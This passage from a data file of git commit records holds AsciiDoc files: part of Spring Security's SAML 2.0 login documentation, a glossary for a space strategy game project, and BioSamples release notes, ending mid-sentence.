performs its own.\n\n[[servlet-saml2login-opensamlauthenticationprovider-onetimeuse]]\nFor example, you can use OpenSAML's `OneTimeUseConditionValidator` to also validate a `<OneTimeUse>` condition, like so:\n\n[source,java]\n----\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nOneTimeUseConditionValidator validator = ...;\nprovider.setAssertionValidator(assertionToken -> {\n Saml2ResponseValidatorResult result = OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator()\n .convert(assertionToken);\n Assertion assertion = assertionToken.getAssertion();\n OneTimeUse oneTimeUse = assertion.getConditions().getOneTimeUse();\n ValidationContext context = new ValidationContext();\n try {\n \tif (validator.validate(oneTimeUse, assertion, context) == ValidationResult.VALID) {\n \t\treturn result;\n \t}\n } catch (Exception e) {\n \treturn result.concat(new Saml2Error(INVALID_ASSERTION, e.getMessage()));\n }\n return result.contact(new Saml2Error(INVALID_ASSERTION, context.getValidationFailureMessage()));\n});\n----\n\n[NOTE]\nWhile recommended, it's not necessary to call `OpenSamlAuthenticationProvider` 's default assertion validator.\nA circumstance where you would skip it would be if you don't need it to check the `<AudienceRestriction>` or the `<SubjectConfirmation>` since you are doing those yourself.\n\n[[servlet-saml2login-opensamlauthenticationprovider-decryption]]\n==== Customizing Decryption\n\nSpring Security decrypts `<saml2:EncryptedAssertion>`, `<saml2:EncryptedAttribute>`, and `<saml2:EncryptedID>` elements automatically by using the decryption <<servlet-saml2login-rpr-credentials,`Saml2X509Credential` instances>> registered in the <<servlet-saml2login-relyingpartyregistration,`RelyingPartyRegistration`>>.\n\n`OpenSamlAuthenticationProvider` exposes <<servlet-saml2login-architecture,two decryption strategies>>.\nThe response decrypter is for decrypting encrypted elements of the `<saml2:Response>`, like `<saml2:EncryptedAssertion>`.\nThe assertion decrypter is for decrypting encrypted elements of the `<saml2:Assertion>`, like `<saml2:EncryptedAttribute>` and `<saml2:EncryptedID>`.\n\nYou can replace `OpenSamlAuthenticationProvider`'s default decryption strategy with your own.\nFor example, if you have a separate service that decrypts the assertions in a `<saml2:Response>`, you can use it instead like so:\n\n[source,java]\n----\nMyDecryptionService decryptionService = ...;\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nprovider.setResponseElementsDecrypter((responseToken) -> decryptionService.decrypt(responseToken.getResponse()));\n----\n\nIf you are also decrypting individual elements in a `<saml2:Assertion>`, you can customize the assertion decrypter, too:\n\n[source,java]\n----\nprovider.setAssertionElementsDecrypter((assertionToken) -> decryptionService.decrypt(assertionToken.getAssertion()));\n----\n\nNOTE: There are two separate decrypters since assertions can be signed separately from responses.\nTrying to decrypt a signed assertion's elements before signature verification may invalidate the signature.\nIf your asserting party signs the response only, then it's safe to decrypt all elements using only the response decrypter.\n\n[[servlet-saml2login-authenticationmanager-custom]]\n==== Using a Custom Authentication Manager\n\n[[servlet-saml2login-opensamlauthenticationprovider-authenticationmanager]]\nOf course, the `authenticationManager` DSL method can be also used to perform a completely custom SAML 2.0 authentication.\nThis authentication manager should expect a `Saml2AuthenticationToken` object containing the SAML 2.0 Response XML data.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n AuthenticationManager authenticationManager = new MySaml2AuthenticationManager(...);\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(authenticationManager)\n )\n ;\n }\n}\n----\n\n[[servlet-saml2login-authenticatedprincipal]]\n=== Using `Saml2AuthenticatedPrincipal`\n\nWith the relying party correctly configured for a given asserting party, it's ready to accept assertions.\nOnce the relying party validates an assertion, the result is a `Saml2Authentication` with a `Saml2AuthenticatedPrincipal`.\n\nThis means that you can access the principal in your controller like so:\n\n[source,java]\n----\n@Controller\npublic class MainController {\n\t@GetMapping(\"\/\")\n\tpublic String index(@AuthenticationPrincipal Saml2AuthenticatedPrincipal principal, Model model) {\n\t\tString email = principal.getFirstAttribute(\"email\");\n\t\tmodel.setAttribute(\"email\", email);\n\t\treturn \"index\";\n\t}\n}\n----\n\n[TIP]\nBecause the SAML 2.0 specification allows for each attribute to have multiple values, you can either call `getAttribute` to get the list of attributes or `getFirstAttribute` to get the first in the list.\n`getFirstAttribute` is quite handy when you know that there is only one value.\n\n[[servlet-saml2login-metadata]]\n=== Producing `<saml2:SPSSODescriptor>` Metadata\n\nYou can publish a metadata endpoint by adding the `Saml2MetadataFilter` to the filter chain, as you'll see below:\n\n[source,java]\n----\nConverter<HttpServletRequest, RelyingPartyRegistration> relyingPartyRegistrationResolver =\n new DefaultRelyingPartyRegistrationResolver(this.relyingPartyRegistrationRepository);\nSaml2MetadataFilter filter = new Saml2MetadataFilter(\n\t\trelyingPartyRegistrationResolver,\n new OpenSamlMetadataResolver());\n\nhttp\n \/\/ ...\n .saml2Login(withDefaults())\n .addFilterBefore(new Saml2MetadataFilter(r), Saml2WebSsoAuthenticationFilter.class);\n----\n\nYou can use this metadata endpoint to register your relying party with your asserting party.\nThis is often as simple as finding the correct form field to supply the metadata endpoint.\n\nBy default, the metadata endpoint is `+\/saml2\/service-provider-metadata\/{registrationId}+`.\nYou can change this by calling the `setRequestMatcher` method on the filter:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\/{registrationId}\", \"GET\"));\n----\n\nensuring that the `registrationId` hint is at the end of the path.\n\nOr, if you have registered a custom relying party registration resolver in the constructor, then you can specify a path without a `registrationId` hint, like so:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\", \"GET\"));\n----\n\n[[servlet-saml2login-logout]]\n=== Performing Single Logout\n\nSpring Security does not yet support single logout.\n\nGenerally speaking, though, you can achieve this by creating and registering a custom `LogoutSuccessHandler` and `RequestMatcher`:\n\n[source,java]\n----\nhttp\n \/\/ ...\n .logout(logout -> logout\n .logoutSuccessHandler(myCustomSuccessHandler())\n .logoutRequestMatcher(myRequestMatcher())\n )\n----\n\nThe success handler will send logout requests to the asserting party.\n\nThe request matcher will detect logout requests from the asserting party.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2f3c8f83ffa4787002d8d101ce7223b5f56d3d","subject":"Update ddd-glossary.asciidoc","message":"Update ddd-glossary.asciidoc","repos":"janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire","old_file":"doc\/ddd-glossary.asciidoc","new_file":"doc\/ddd-glossary.asciidoc","new_contents":".Table Glossary\n[cols=\"a,a,a,a\",width=\"100%\"]\n|===\n| Term | Description | Supertype (is-a) | Relations (has-a)\n\n| universe\n| The sandbox for history to take place.\n| -\n| \n* nation{+}\n* star{+}\n* fleet{*}\n\n| nation\n| The organizational structure that allows individuals to act as a group. \n| - \n| \n* species{1}\n* leader{1}\n\n| species \n| A group of organisms being on the cusp to the stars.\n| -\n| -\n\n| leader \n| A single individual massively influencing the actions of a species. Might be some kind of emperor or elected sovereign.\n| -\n| -\n\n| star\n| \"A star is a luminous sphere of plasma held together by its own gravity. The nearest star to Earth is the Sun.\" https:\/\/en.wikipedia.org\/wiki\/Star[(Wikipedia)]\n| - \n| \n* spectral class{1}\n* planetary characteristics{1}\n* colony{0..1}\n* fleet{*}\n\n| spectral class \n| \n* O and B (blue)\n* A (white)\n* F (green)\n* G (yellow)\n* K (orange)\n* M (red)\n\nAccording to the http:\/\/www.meixnerobservatorium.at\/astronomie-allgemein-astronomy-popular\/hertzsprung-russel-diagramm\/[Hertzsprung\u2013Russell diagram] F should rather be white\/yellow instead of green. The spectral class of a star influences what kind of planets might orbiting it. Stars of class G and partially F and K have the highest likelihood for earth like planets.\n| -\n| -\n\n| planetary characteristics\n| Summarizes the overall characteristics of a solar system's planets. That means individual planets are not taken into account but rather an average value. The characteristics include e.g. environment, specials and size.\n| -\n|\n* environment{1}\n* specials{*}\n* (size)\n\n| environment \n| Terran, Jungle, Ocean, Arid, Steppe, Desert, Minimal, Barren, Tundra, Dead, Inferno, Toxic, Radiated\n| -\n| -\n\n| special\n| Mineral Poor, Ultra Poor, Artifact, Mineral Rich, Ultra Rich, Hostile, Fertile, Gaia\n| -\n| -\n\n| colony \n| \"A colony is a territory under the immediate political control of a geographically distant state.\" https:\/\/en.wikipedia.org\/wiki\/Colony_(disambiguation)[(Wikipedia)] \n| - \n| \n* nation{1}\n* total production{1}\n* scan radius{1}\n\n| fleet\n| A group of ships commanded by a nation. Is either orbiting a star or traveling through deep space. \n| - \n|\n* nation{1}\n* ship{+}\n* star{0..1}\n\n| ship\n| A single space vessel. The type is either:\n\n* scout (speed = 0.5, scan radius = 0.5)\n* fighter (speed = 0.4, scan radius = 0.25)\n* colony ship (speed = 0.25, scan radius = 0.5)\n| -\n|\n* type\n* scan radius{1}\n* speed [parsecs\/turn]\n\n|=== \n","old_contents":".Table Glossary\n[cols=\"a,a,a,a\",width=\"100%\"]\n|===\n| Term | Description | Supertype (is-a) | Relations (has-a)\n\n| universe\n| The sandbox for history to take place.\n| -\n| \n* nation{+}\n* star{+}\n* fleet{*}\n\n| nation\n| The organizational structure that allows individuals to act as a group. \n| - \n| \n* species{1}\n* leader{1}\n\n| species \n| A group of organisms being on the cusp to the stars.\n| -\n| -\n\n| leader \n| A single individual massively influencing the actions of a species. Might be some kind of emperor or elected sovereign.\n| -\n| -\n\n| star\n| \"A star is a luminous sphere of plasma held together by its own gravity. The nearest star to Earth is the Sun.\" https:\/\/en.wikipedia.org\/wiki\/Star[(Wikipedia)]\n| - \n| \n* spectral class{1}\n* planetary characteristics{1}\n* fleet{*}\n\n| spectral class \n| \n* O and B (blue)\n* A (white)\n* F (green)\n* G (yellow)\n* K (orange)\n* M (red)\n\nAccording to the http:\/\/www.meixnerobservatorium.at\/astronomie-allgemein-astronomy-popular\/hertzsprung-russel-diagramm\/[Hertzsprung\u2013Russell diagram] F should rather be white\/yellow instead of green. The spectral class of a star influences what kind of planets might orbiting it. Stars of class G and partially F and K have the highest likelihood for earth like planets.\n| -\n| -\n\n| planetary characteristics\n| Summarizes the overall characteristics of a star system's planets. That means individual planets are not taken into account but rather a average value. The characteristics include e.g.: planetary environment, planetary specials and planetary size.\n| -\n|\n* planetary environment{1}\n* planetary specials{*}\n\n| planetary environment \n| \n* Terran\n* Jungle\n* Ocean\n* Arid\n* Steppe\n* Desert\n* Minimal\n* Barren\n* Tundra\n* Dead \n* Inferno\n* Toxic\n* Radiated\n| -\n| -\n\n| planetary special\n| \n* Mineral Poor\n* Ultra Poor\n* Artifact\n* Mineral Rich\n* Ultra Rich\n* Hostile\n* Fertile\n* Gaia\n| -\n| -\n\n| colony \n| \"A colony is a territory under the immediate political control of a geographically distant state.\" https:\/\/en.wikipedia.org\/wiki\/Colony_(disambiguation)[(Wikipedia)] \n| - \n| \n* star{1}\n* nation{1}\n* total production{1}\n* production ratios{1}\n\n| fleet\n| A group of ships commanded by a nation. Is either orbiting a star or traveling through deep space. \n| - \n|\n* nation{1}\n* ship{+}\n* star{0..1}\n\n| ship\n| A single space vessel.\n| -\n| -\n\n|=== \n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8367e89c52225d14cdf5d299a3fb9c367936e825","subject":"Prepare for release version 4.1.4","message":"Prepare for release version 4.1.4\n","repos":"EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"= [.ebi-color]#Release notes#\n:toc: auto\n\nThis pages contains links to release notes for BioSamples for version 4.0.0 and higher. This release represents a comprehensive overhaul and therefore previous release notes are no longer applicable.\n\n[[section]]\n4.1.4\n----\n\n* As part of curation pipeline attributes with the value \"not_applicable\" are removed\n* Date titles on the sample page are now \"Releases on\" and \"Updated on\" rather than \"Release\" and \"Update\"\n* An initial accession endpoint has been added to the REST API to enable ENA to get a list of accessions for a project\n* A multi-step Docker build has been added to allow Docker images to be distributed on quay.io\n* A fix has been made for an issue that caused the Zooma Pipeline to fail on wwwdev\n\n\n[[section]]\n4.1.3\n----\n\n* Additional sample attributes required by ENA are now available including a single, top-level taxId field\n* The export box for a sample is now renamed download and contains a list of serialisations that always download as a file fixing a blocked popups issue in Safari\n* The search results now have an updated look and feel based on feedback from ENA\n\n\n[[section]]\n4.1.2\n----\n\n* Sample JSON now contains a numeric taxId field at the top level\n* IRI of ontology terms now resolve to the defining ontology when they are available in multiple ontologies\n* Requests for a sample now contain a computed ETag header to identify changes\n* When requesting a private sample an explanation message is now provided in addition to the 403 error code\n* The search UI now contains a clear filters button\n\n\n[[section]]\n4.1.1\n----\n\n* Expose the BioSchemas markup with enhanced context and Sample ontology code\n* SampleTab submission pipeline has been rewritten for better robustness\n* In the samples results page, the sample name and the sample accession are now linking to the single sample page\n* Fixed various broken hyperlinks on the home page and in documentation\n\n\n[[section]]\n4.1.0\n----\n\n### New features\n\n* GDPR:\n** SampleTab submissions enforce explicit acceptance of the terms of service and the privacy information\n** GDPR notices added throughout\n* SampleTab where targets of relationships are neither sample name nor sample accession are now rejected, providing user additional information on the problematic data\n* *Bioschema.org* entities are exported in BioSamples and available both in the UI - embedded in a script tag - and through the API\n\n### Bug fixes\n* Solved issues with wrong header\u2019s hyperlinks\n* Solved issue with resolving relationship by name in SampleTab submissions\n* Solved issue with converting DatabaseURI to external references in SampleTab submissions\n* Improved special characters handling in SampleTab submissions\n\n\n[[section]]\n4.0.7\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* GDPR notices\n* Update format of the Sitemap file\n\n[[section]]\n4.0.6\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improves search handling of special characters in facets\n* Improves search handling of special characters in search terms\n* Fix issue with curation link URLs\n* Implemented DataCatalog, Dataset and DataRecord profiles on JSON+LD\n* Add ability to control which curation domains are applied to a sample\n* Updated and improved API documentation\n* Updated and improved SampleTab documentation\n* Fix links to XML and JSON serialisation in the UI\n* Fix bug in handling special characters in SampleTab submission\n* Add export pipeline\n* Add copy down pipeline\n\n[[section]]\n4.0.5\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improved consistency of paged search results if any of the samples are added or modified whilst paging\n* Improved search update throughput by using Solr transaction log \n* Updated JSON+LD format to the latest version\n* Correctly accept XML sample groups and their related samples\n* Fix issue related to search query terms not being applied to legacy XML and legacy JSON endpoints.\n* Fix incorrect HAL links on autocomplete endpoint\n* Replace SampleTab submitted relationships by name with accessions. As a consequence, they can now be consistently cross referenced by accession in user interface and API\n* Improved indexing of samples when they are rapidly updated or curated\n* Updated Elixir Deposition Database banner URL\n* Reduce number of Zooma calls by not attempting to map \"unknown\" or \"other\" attributes\n* Reduce load on OLS by ensuring Zooma does not requery OLS as any results from OLS would not be used by BioSamples\n\n[[section]]\n4.0.4\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Persistence of search terms and filters when using HAL paging links\n* SameAs relation in the legacy JSON API works as intended\n* Removed residual test endpoints from legacy JSON API\n* Details relation in legacy JSON API now correctly resolves\n* Added informative and specific title to webpages\n* Added https:\/\/www.elixir-europe.org\/platforms\/data\/elixir-deposition-databases[Elixir Deposition Database] banner \n\n[[section]]\n4.0.3\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Forward legacy group URLs \/biosamples\/groups\/SAMEGxxxx to \/biosamples\/samples\/SAMEGxxxxx\n* Missing or malformed update and release date on legacy XML group submission will default to current datetime. It is not recommended that users intentionally rely on this.\n* Index legacy XML group submissions, which was not happening due to an unexpected consequence of the interaction of components. \n* Redirect \/biosamples\/sample and \/biosamples\/group URLs in case of typo \n\n[[section]]\n4.0.2\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix javascript on SampleTab submission and accession\n* Handle load-balanced accessioning\n* Fix for storage of relationships source on new samples\n\n[[section]]\n4.0.1\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix submission of new unaccessioned samples with relationships by inserting an assigned accession into the source of any relationships that are missing it. \n* Fix curation pipeline of numeric organism iri to \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_+taxId\" when it should be \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_\"+taxId e.g. http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\n* Allow CORS requests for legacy XML APIs.\n* Updated homepage project sample links to use a filter search rather than a text search.\n\n[[section]]\n4.0.0\n-----\n\nVersion v4.0.0 represents a re-architecture and re-engineering of the\nBioSamples software stack. It is now based on the Java\nhttps:\/\/projects.spring.io\/spring-boot[Spring-Boot] framework, utilising\nhttps:\/\/www.mongodb.com[MongoDB] for storage and\nhttps:\/\/lucene.apache.org\/solr[Solr] for indexing and search. It tries\nto follow up-to-date web standards and conventions, while remaining\nbackwards compatible. This will also give us a strong and stable\nfoundation to build more features and improvements from, more reliably\nand more rapidly.\n\nHighlights include:\n\n* Submissions and updates will be available immediately via accession,\nand will be available via search within a few minutes or less. There is\nalso improved handling of submissions and updates, with fewer errors and\nbetter feedback about any problems.\n* Integration with https:\/\/aap.tsi.ebi.ac.uk[EBI AAP] for login\nmanagement and access to pre-publication samples, including use of\nhttps:\/\/www.elixir-europe.org\/services\/compute\/aai[ELIXIR AAI] single\nsign-on accounts.\n* Separation of submitted sample information from curation of that\ninformation, including the ability for 3rd party (re-)curation of\nsamples. Please contact us if you would be interested in more\ninformation and\/or to supply curation information.\n* Improved handling of non-alphanumeric characters in attribute types\ne.g. \"geographic location (country and\/or sea)\"\n* Improved faceting allowing selection of multiple values within same\nfacet, fixed re-use and re-distribution of search URLs. This will be\nexpanded in future with additional facet types where appropriate.\n* Support and recommend the use\nof\u00a0https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Content_negotiation[content\nnegotiation] to accessing multiple formats at the same URIs. In addition\nto the content (HTML vs XML vs JSON) this also supports\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Compression[compression]\nand https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Caching[caching]\nthrough standard mechanisms.\n* Java client using Spring, and a Spring-Boot starter module for easy\nuse. This is used by BioSamples internally and other teams at EMBL-EBI,\nso is high performance and battle tested.\n* Containerisation using Docker and Docker-Compose, which makes it\neasier to run a local version for client development or for local\nstorage of sample information.\n\n[[data-content]]\nData content\n~~~~~~~~~~~~\n\n* Ontology terms Numeric tax IDs (e.g. 9606) and short ontology terms\n(e.g.\u00a0PATO:0000384) are being replaced with full IRIs (e.g.\nhttp:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\u00a0and\u00a0http:\/\/purl.obolibrary.org\/obo\/PATO_0000384\u00a0)\nin many places, eventually everywhere.\n* Groups will continue to exist for backwards compatibility purposes.\nHowever, we are investigating future development to reduce or remove\nmany of these in favour of alternatives such as filtering samples by\nexternal link, or delegating grouping of samples to other EMBL-EBI\narchives such as https:\/\/www.ebi.ac.uk\/biostudies[BioStudies].\n\n[[jsonbiosamples]]\nJSON\u00a0`\/biosamples`\n~~~~~~~~~~~~~~~~~~\n\nThis is the preferred API for use, and uses the same URIs as the HTML\npages, and utilising\u00a0content negotiation\u00a0to provide a JSON response.\nThis is designed as\na\u00a0https:\/\/en.wikipedia.org\/wiki\/Hypertext_Application_Language[hypermedia\nas the engine of application state (HATEOS) API]\u00a0and therefore we\nrecommend users do not use specific URLs but rather follow relationships\nbetween API endpoints, much like a user would use links between HTML\npages. It is similar to the `\/biosamples\/api`\u00a0JSON format, with a few\ncritical differences:\n\n* added __release__\u00a0in full\u00a0ISO 8601 format including time. The\nbackwards-compatible\u00a0__releaseDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* added\u00a0__update__\u00a0in full\u00a0ISO 8601\u00a0format including time.\nThe\u00a0backwards-compatible\u00a0__updateDate__ exists but should be considered\ndeprecated and will be removed in a future release.\n* removed\u00a0__description__\u00a0as a separate field, is now available as\na\u00a0__characteristic__.\u00a0\n* remove\u00a0**relations**\u00a0rel link; equivalent information is now embedded\nin sample in __relationships__\u00a0and\u00a0__externalReferences__\u00a0lists.\n* remove\u00a0**sample**\u00a0rel link; with relations now embedded, this link\nserves no purpose.\n* added\u00a0**curationLinks**\u00a0rel link.\n* ordering may be different.\n* fields are not displayed if empty or null.\n* characteristic names accurately reflect what was submitted and may now\nbe multiple words and may include non alphanumeric characters (e.g\nbrackets, greek letters, etc). In the `\/biosamples\/api` responses\ncharacteristic names were always camelCased and with non-alphanumeric\ncharacters removed.\n* external references directly embedded in the samples and the groups.\n\n[[xmlbiosamplesxml]]\nXML\u00a0`\/biosamples\/xml`\n~~~~~~~~~~~~~~~~~~~~~\n\nWe are maintaining this for backwards compatibility. Later in 2018 we\nwill be consulting about future development of this API, particularly in\nthe context of the improved JSON `\/biosamples` API using content\nnegotiation and several long-standing issues with limitations arising\nfrom the XML schema in use.\n\n* XML element *TermSourceREF* element *Name* and element *URI* are\nremoved.\n* XML element *Property* attributes characteristic and comment always\nfalse.\n* elements and attributes may be in different order.\n* allows only one IRI on attributes, so in rare cases of multiple IRIs\nwill not be complete.\n* Query parameter `query` has now a default value of * if none is\nprovided.\n* Query parameter `sort` is ignored for the search, due to undefined\nbehaviour and lack of usage.\n\n[[json-biosamplesapi]]\nJSON `\/biosamples\/api`\n~~~~~~~~~~~~~~~~~~~~~~\n\nThis API should be considered **deprecated**\u00a0and we will aim to remove\nit by 2019. Any users of this should move to using the `\/biosamples`\nURIs to retrieve JSON representations with an improved schema via\ncontent negotiation. Further announcements will be made in future for\nspecific updates and deadlines.\n\n* ordering may be different from previous versions, and is not\nguaranteed for future versions.\n* fields are not displayed if empty or null.\n* `\/api\/externallinksrelations\/{id}\/sample` and\n`\/api\/externallinksrelations\/{id}\/group` are removed due to lack of\nusage.\n* fixed _externalReferences_ and _publications_ to be nested objects and\nnot JSON strings.\n\n[[acknowledgements]]\nAcknowledgements\n~~~~~~~~~~~~~~~~\n\nThis release has been made possible with the support of our funders:\n\n* EMBL-EBI Core Funds\n* EC -ELIXIR-EXCELERATE \n* WT- HIPSCI\n* IMI - EBiSC\n* ELIXIR \u2013 Meta Data Implementation Study \n* WT-GA4GH\n","old_contents":"= [.ebi-color]#Release notes#\n:toc: auto\n\nThis pages contains links to release notes for BioSamples for version 4.0.0 and higher. This release represents a comprehensive overhaul and therefore previous release notes are no longer applicable.\n\n[[section]]\n4.1.3\n----\n\n* Additional sample attributes required by ENA are now available including a single, top-level taxId field\n* The export box for a sample is now renamed download and contains a list of serialisations that always download as a file fixing a blocked popups issue in Safari\n* The search results now have an updated look and feel based on feedback from ENA\n\n[[section]]\n4.1.2\n----\n\n* Sample JSON now contains a numeric taxId field at the top level\n* IRI of ontology terms now resolve to the defining ontology when they are available in multiple ontologies\n* Requests for a sample now contain a computed ETag header to identify changes\n* When requesting a private sample an explanation message is now provided in addition to the 403 error code\n* The search UI now contains a clear filters button\n\n\n[[section]]\n4.1.1\n----\n\n* Expose the BioSchemas markup with enhanced context and Sample ontology code\n* SampleTab submission pipeline has been rewritten for better robustness\n* In the samples results page, the sample name and the sample accession are now linking to the single sample page\n* Fixed various broken hyperlinks on the home page and in documentation\n\n\n[[section]]\n4.1.0\n----\n\n### New features\n\n* GDPR:\n** SampleTab submissions enforce explicit acceptance of the terms of service and the privacy information\n** GDPR notices added throughout\n* SampleTab where targets of relationships are neither sample name nor sample accession are now rejected, providing user additional information on the problematic data\n* *Bioschema.org* entities are exported in BioSamples and available both in the UI - embedded in a script tag - and through the API\n\n### Bug fixes\n* Solved issues with wrong header\u2019s hyperlinks\n* Solved issue with resolving relationship by name in SampleTab submissions\n* Solved issue with converting DatabaseURI to external references in SampleTab submissions\n* Improved special characters handling in SampleTab submissions\n\n\n[[section]]\n4.0.7\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* GDPR notices\n* Update format of the Sitemap file\n\n[[section]]\n4.0.6\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improves search handling of special characters in facets\n* Improves search handling of special characters in search terms\n* Fix issue with curation link URLs\n* Implemented DataCatalog, Dataset and DataRecord profiles on JSON+LD\n* Add ability to control which curation domains are applied to a sample\n* Updated and improved API documentation\n* Updated and improved SampleTab documentation\n* Fix links to XML and JSON serialisation in the UI\n* Fix bug in handling special characters in SampleTab submission\n* Add export pipeline\n* Add copy down pipeline\n\n[[section]]\n4.0.5\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improved consistency of paged search results if any of the samples are added or modified whilst paging\n* Improved search update throughput by using Solr transaction log \n* Updated JSON+LD format to the latest version\n* Correctly accept XML sample groups and their related samples\n* Fix issue related to search query terms not being applied to legacy XML and legacy JSON endpoints.\n* Fix incorrect HAL links on autocomplete endpoint\n* Replace SampleTab submitted relationships by name with accessions. As a consequence, they can now be consistently cross referenced by accession in user interface and API\n* Improved indexing of samples when they are rapidly updated or curated\n* Updated Elixir Deposition Database banner URL\n* Reduce number of Zooma calls by not attempting to map \"unknown\" or \"other\" attributes\n* Reduce load on OLS by ensuring Zooma does not requery OLS as any results from OLS would not be used by BioSamples\n\n[[section]]\n4.0.4\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Persistence of search terms and filters when using HAL paging links\n* SameAs relation in the legacy JSON API works as intended\n* Removed residual test endpoints from legacy JSON API\n* Details relation in legacy JSON API now correctly resolves\n* Added informative and specific title to webpages\n* Added https:\/\/www.elixir-europe.org\/platforms\/data\/elixir-deposition-databases[Elixir Deposition Database] banner \n\n[[section]]\n4.0.3\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Forward legacy group URLs \/biosamples\/groups\/SAMEGxxxx to \/biosamples\/samples\/SAMEGxxxxx\n* Missing or malformed update and release date on legacy XML group submission will default to current datetime. It is not recommended that users intentionally rely on this.\n* Index legacy XML group submissions, which was not happening due to an unexpected consequence of the interaction of components. \n* Redirect \/biosamples\/sample and \/biosamples\/group URLs in case of typo \n\n[[section]]\n4.0.2\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix javascript on SampleTab submission and accession\n* Handle load-balanced accessioning\n* Fix for storage of relationships source on new samples\n\n[[section]]\n4.0.1\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix submission of new unaccessioned samples with relationships by inserting an assigned accession into the source of any relationships that are missing it. \n* Fix curation pipeline of numeric organism iri to \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_+taxId\" when it should be \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_\"+taxId e.g. http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\n* Allow CORS requests for legacy XML APIs.\n* Updated homepage project sample links to use a filter search rather than a text search.\n\n[[section]]\n4.0.0\n-----\n\nVersion v4.0.0 represents a re-architecture and re-engineering of the\nBioSamples software stack. It is now based on the Java\nhttps:\/\/projects.spring.io\/spring-boot[Spring-Boot] framework, utilising\nhttps:\/\/www.mongodb.com[MongoDB] for storage and\nhttps:\/\/lucene.apache.org\/solr[Solr] for indexing and search. It tries\nto follow up-to-date web standards and conventions, while remaining\nbackwards compatible. This will also give us a strong and stable\nfoundation to build more features and improvements from, more reliably\nand more rapidly.\n\nHighlights include:\n\n* Submissions and updates will be available immediately via accession,\nand will be available via search within a few minutes or less. There is\nalso improved handling of submissions and updates, with fewer errors and\nbetter feedback about any problems.\n* Integration with https:\/\/aap.tsi.ebi.ac.uk[EBI AAP] for login\nmanagement and access to pre-publication samples, including use of\nhttps:\/\/www.elixir-europe.org\/services\/compute\/aai[ELIXIR AAI] single\nsign-on accounts.\n* Separation of submitted sample information from curation of that\ninformation, including the ability for 3rd party (re-)curation of\nsamples. Please contact us if you would be interested in more\ninformation and\/or to supply curation information.\n* Improved handling of non-alphanumeric characters in attribute types\ne.g. \"geographic location (country and\/or sea)\"\n* Improved faceting allowing selection of multiple values within same\nfacet, fixed re-use and re-distribution of search URLs. This will be\nexpanded in future with additional facet types where appropriate.\n* Support and recommend the use\nof\u00a0https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Content_negotiation[content\nnegotiation] to accessing multiple formats at the same URIs. In addition\nto the content (HTML vs XML vs JSON) this also supports\nhttps:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Compression[compression]\nand https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Caching[caching]\nthrough standard mechanisms.\n* Java client using Spring, and a Spring-Boot starter module for easy\nuse. This is used by BioSamples internally and other teams at EMBL-EBI,\nso is high performance and battle tested.\n* Containerisation using Docker and Docker-Compose, which makes it\neasier to run a local version for client development or for local\nstorage of sample information.\n\n[[data-content]]\nData content\n~~~~~~~~~~~~\n\n* Ontology terms Numeric tax IDs (e.g. 9606) and short ontology terms\n(e.g.\u00a0PATO:0000384) are being replaced with full IRIs (e.g.\nhttp:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\u00a0and\u00a0http:\/\/purl.obolibrary.org\/obo\/PATO_0000384\u00a0)\nin many places, eventually everywhere.\n* Groups will continue to exist for backwards compatibility purposes.\nHowever, we are investigating future development to reduce or remove\nmany of these in favour of alternatives such as filtering samples by\nexternal link, or delegating grouping of samples to other EMBL-EBI\narchives such as https:\/\/www.ebi.ac.uk\/biostudies[BioStudies].\n\n[[jsonbiosamples]]\nJSON\u00a0`\/biosamples`\n~~~~~~~~~~~~~~~~~~\n\nThis is the preferred API for use, and uses the same URIs as the HTML\npages, and utilising\u00a0content negotiation\u00a0to provide a JSON response.\nThis is designed as\na\u00a0https:\/\/en.wikipedia.org\/wiki\/Hypertext_Application_Language[hypermedia\nas the engine of application state (HATEOS) API]\u00a0and therefore we\nrecommend users do not 